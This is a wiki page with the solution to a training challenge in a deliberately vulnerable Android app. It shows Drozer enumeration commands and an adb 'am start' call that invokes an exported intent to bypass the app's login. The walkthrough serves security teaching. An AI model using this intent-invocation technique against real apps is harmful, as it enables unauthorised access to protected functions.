Skip to content

Authorised Area Solution

Jump to bottom
Tim Guenther edited this page Jul 24, 2017 · 1 revision
  1. Follow the challenge set up guide.
  2. Execute the following commands in the Drozer cli:
    Drozer Commands
    1. run app.package.list
      This will generate a list of all packages installed on the device/emulator.
    2. run app.package.info -a ruhrpott.owasp.com.vuln_app_1
      This will display general information about the application.
    3. run app.package.manifest ruhrpott.owasp.com.vuln_app_1
      Displays information about the manifest and available intents.
  3. With the information gathered with drozer will will open a shell on the Andorid device/emulator:
    adb shell
  4. At last we will call the intent manually to bypass the authorisation:
    am start -a "ruhrpott.owasp.com.vuln_app_1.loggeddin" -t "text/plain"
    -a : The intent to call.
    -t : The type for the intent.
  5. On the Android VM the app will open a message with "You did it! Well done."
    App

Please open an issue in the case you found a mistake in the wiki.

Challenges

Solutions

Clone this wiki locally